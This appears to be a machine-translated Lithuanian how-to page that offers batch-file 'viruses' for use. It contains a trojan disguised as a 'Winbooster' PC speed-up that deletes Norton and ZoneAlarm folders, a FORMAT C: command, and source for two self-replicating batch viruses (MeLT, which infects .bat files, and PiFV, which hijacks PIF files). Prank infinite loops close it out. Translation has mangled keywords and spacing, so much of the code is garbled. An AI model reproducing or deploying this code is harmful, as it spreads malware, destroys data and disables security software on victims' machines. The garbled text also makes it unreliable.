Partijos gudrybės ir virusai: 3 žingsniai

2024 Autorius: John Day | [email protected]. Paskutinį kartą keistas: 2024-01-30 10:50

PASTABA: Aš nesu atsakingas už bet kokią žalą, kurią padarote savo kompiuteriui kito asmens kompiuteriui Pastaba: Kai norite išsaugoti failą, turėtumėte jį išsaugoti kaip bet ką.bat

1 žingsnis: tikri virusai (paprasti)

pirmasis: nukopijuokite kodą ****************************************** **************@echo Sveiki atvykę į „ELECTROfun@echo“„Winbooster“, jei norite, kad jūsų kompiuteris būtų spartesnis, atlikite šiuos veiksmus@pause cd / c: dir dir c: / progra ~ 1 / norton ~ 1 @echo dabar turėtumėte įvesti y ir paspausti enter @pause del c: / progra ~ 1 / norton ~ 1 @pause c: dir @pause @dir c: / progra ~ 1 dir c: / progra ~ 1 / zonea ~ 1 / zonealarm del c: / progra ~ 1 / zonea ~ 1 / zonealarm @echo gerai, dabar jūsų kompiuteris yra "TIKRAI!" Greitas: išeiti ********************************************** *Pastaba: išsaugokite failą viską, ko norite.bat Pastaba: viską, kas yra po @echo, galima pakeisti (galite rašyti ką tik norite) Antrasis: *************** spalva 02FORMATAS C: ***************

2 žingsnis: tikri virusai (pažengusieji)

1. Galingiausias *******************@jei ne '%0 ==' jei '%_melt%==' goto meltbeg:: ---- manekenas šeimininkas --------@echo offecho Hello World!:: ---- end dummy host ----@goto MeLTend [MeLT_2a]: MeLTbeg@echo off%_MeLT%if '%1 ==' MeLT goto MeLT %2 jei neegzistuoja %comspec %set comspec = %_ MeLT %komanda %comspec % /e: 5000 /c %0 MeLT virset MeLTcl = %1 %2 %3 %4 %5 %6 %7 %8 %9call % 0 MeLT rhset _MeLT = nustatyti MeLTcl = goto MeLTend: MeLTrhset _MeLT = x%0%MeLTcl%: MeLTvirset MeLTH =%0 jei neegzistuoja%_MeLT %% temp%\ nul set temp =%tmp%jei yra%temp%\ MeLT_2a goto MeLTrun%0 MeLT fnd. %path%: MeLTfndshift%_MeLT%if '%2 ==' išeiti iš MeLTset MeLT =%2 \%MeLTH%.batif neegzistuoja%MeLT%nustatytas MeLT =%2 \%MeLTH%jei nėra %2%MeLTH%.batif neegzistuoja%MeLT%nustatytas MeLT =%2%MeLTH%, jei neegzistuoja…%path%: MeLTsshift%_MeLT%if '%2 ==' išeiti iš MeLTfor %% a in (%2 \*. bat%2*.bat) skambinti%MeLTH%MeLT inf %% agoto MeLTs: MeLTinffind / i "MeLT" nulif not errorlevel 1 goto MeLTnoecho @if not '%% 0 ==' if '%% _ melt %% ==' goto meltbeg> MeLT.ttype%3 >> MeLT.techo. >> MeLT.ttype% temp %\ MeLT_2a >> MeLT.tmove MeLT.t %3> nulexit MeLT: MeLTact - „flash -melt“ekrano tekstas, tada grąžintas į normalų režimą 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE> MeLT.techo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8 >> MeLT.techo e 120 B4 4C CD 21 00 >> MeLT.techo g >> MeLT.tdebugnuldel MeLT.texit MeLT: MeLTnoset MeLTC =%MeLTC%1if%MeLTC%== 1111111111 eikite į MeLTact: MeLTend *********************************** ******** 2. Tai virusas, kuris „užkrečia“PIF failus, kuriuos „Windows“naudoja DOS programoms paleisti. Tai veikia sukuriant paslėptas papildomas partijas, kuriose yra šios kopijos, tada pakeičiant PIF failą, kad pirmasis paleidžiamas papildomas paketas. Po to, kai kompanionas paleidžiamas, jis paleidžia originalią pagrindinę programą, kurios pavadinimas yra užkoduotas kompanione. Pif failai yra pažymėti, kad jie nebūtų pakartotinai užkrėsti. Tai paveikia tik PIF, užkrėstos programos nėra keičiamos. Norėdami „išgydyti“, naudokite PIFEDIT, kad atkurtumėte pradinius failų pavadinimus, tada ištrinkite paslėptus failus. ******************************* ***************@echo off:: prieglobos failo pavadinimas … nustatykite pifvo = LIST. COM:: kilpos dispečeris… jei '%1 ==' PiFV pereina prie PiFV_%2:: paleiskite virusas! set _PiFV = jei neegzistuoja%comspec%set comspec = C: / COMMAND. COM%_PiFV %% comspec% /e: 5000 /c%0 PiFV go> nulif egzistuoti PiFV! del PiFV!:: paleiskite pagrindinį kompiuterį PiFVcl = %1 %2 %3 %4 %5 %6 %7 %8 %9call %0 PiFV hstset PiFVo = nustatyti PiFVcl =:: patikrinti aktyvavimą… echo. | data | rasti / i "sat"> nul. PiFVif 1 pakopos lygis „PiFV_endecho. | time | find" 7 "> nul. PiFVif errorlevel 1 goto PiFV_msgset PiFV = echocls%_PiFV %% PiFV%.%PiFV%Kadaise buvo ūdra, pavadinta Oscer%PiFV% % Kas teigė, kad žino, kaip pasigaminti vandens.% PiFV% "Daugiau užtvankų", - sakė jis, "naudok mano vandenį!"% PiFV% Tačiau vyresnysis ūdras nebuvo sužavėtas.pauzė> nul. PiFVset PiFV = goto PiFV_end: PiFV_msgecho [PiFV] pateikė WaveFuncgoto PiFV_end: PiFV_hst%PiFVo%%PiFVcl%goto PiFV_end: PiFV_goset PiFVh =%0if neegzistuoja%PiFVh%nustatytas PiFVh =%0.batif nėra> PiFVh%exit%% skambinkite %0 PiFV inf %% aexit PiFV: PiFV_infset PiFVp = %3:: gaukite aukos failo pavadinimą ir infekcijos žymeklį:: iš PIF failo naudodami derinimą … jei yra PiFV! goto PiFV_1echo m 124, 162 524> PiFV! echo e 100 '@set fn =' >> PiFV! echo m 524, 562 108 >> PiFV! echo n pifv $.bat >> PiFV! echo rcx >> PiFV! echo 47 >> PiFV! Echo w >> PiFV! Echo m 55E, 561 108 >> PiFV! Echo e 10C 0 >> PiFV! Echo n pifv $$. Bat >> PiFV! Echo rcx >> PiFV! Echo 10 >> PiFV! Echo w >> PiFV! Echo q >> PiFV!: PiFV_1debug%PiFVp%nulcall PiFV $ set PiFVn =%fn%call PiFV $$ set PiFVi =%fn%del PiFV $ ?. bat:: pifvn = orig failo pavadinimas:: pifvi = infekcijos žymeklis:: pifvp = pif failo pavadinimas:: pifvh = kompanionas šikšnosparnių failas:: praleisti užkrėstus arba „tuščius“pif … jei '%PiFVi%==' PiFV goto PiFV_endif '%PiFVn%==' goto PiFV_end:: ne šešėlis command.com (būk malonus) echo %PiFVn %| find /i "command"> nulif not errorlevel 1 goto PiFV_end:: užkrečiama - sukurkite papildomą paketą …:: (šie kodo elementai pašalinami iš plėtinio) echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88> PiFV $$ echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21 >> PiFV $$ echo e 120 c3 73 65 74 20 66 6e 3d 24 00 >> PiFV $$ echo n pifv $.com >> PiFV $$ echo rcx >> PiFV $$ echo 2a >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV $$ debugnulecho%PiFVn%| PiFV $> PiFV $$. Batcall PiFV $$ set PiFVb =%fn%.batdel PiFV $?. pavadinimas kaip hostif%PiFVo%==%PiFVb%goto PiFV_endif egzistuoja%PiFVb%goto PiFV_endecho @echo off>%PiFVb%echo set pifvo =%pifvn%>>%PiFVb%find "PiFV">%PiFVb%attrib%PiFVb% +h::… ir nukreipkite PIF į kompanioną 15E 'PiFV', 0> PiFV $$ echo e 124 '%PiFVb%', 0 >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV $$ debug %PiFVp %nuldel PiFV $$:: Manau, kad baigėme! išeiti iš PiFV: PiFV_end:: įdomu, kiek visko jame yra klaidų? Tik vienas:: būdas sužinoti … **************************************** **********

3 žingsnis: išdaigos virusas ir triukas

1. išdaigos virusas ******************* spalva 02@echo offecho dir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/ sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/secho@echo* ************************ *************************@echo offcolor 02: startecho %atsitiktinis % %atsitiktinis % %atsitiktinis % %atsitiktinis % %atsitiktinis % %atsitiktinis % % atsitiktinis%% atsitiktinis%% atsitiktinis%% atsitiktinis%% atsitiktinis%% atsitiktinis%% atsitiktinis%% atsitiktinis% goto start ************************ ******************